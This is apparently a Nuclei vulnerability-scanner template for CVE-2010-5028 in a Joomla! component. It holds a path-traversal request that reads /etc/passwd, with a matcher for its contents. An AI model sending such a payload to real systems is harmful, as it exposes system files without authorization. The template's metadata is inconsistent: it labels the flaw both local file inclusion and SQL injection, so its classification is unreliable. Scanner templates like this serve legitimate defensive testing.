38 lines
1.1 KiB
YAML
38 lines
1.1 KiB
YAML
id: CVE-2010-5028
|
|
|
|
info:
|
|
name: Joomla! Component JE Job 1.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/12601
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-5028
|
|
- http://www.vupen.com/english/advisories/2010/1269
|
|
- http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/
|
|
remediation: Upgrade to a supported version.
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2010-5028
|
|
cwe-id: CWE-89
|
|
tags: cve,cve2010,joomla,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/18
|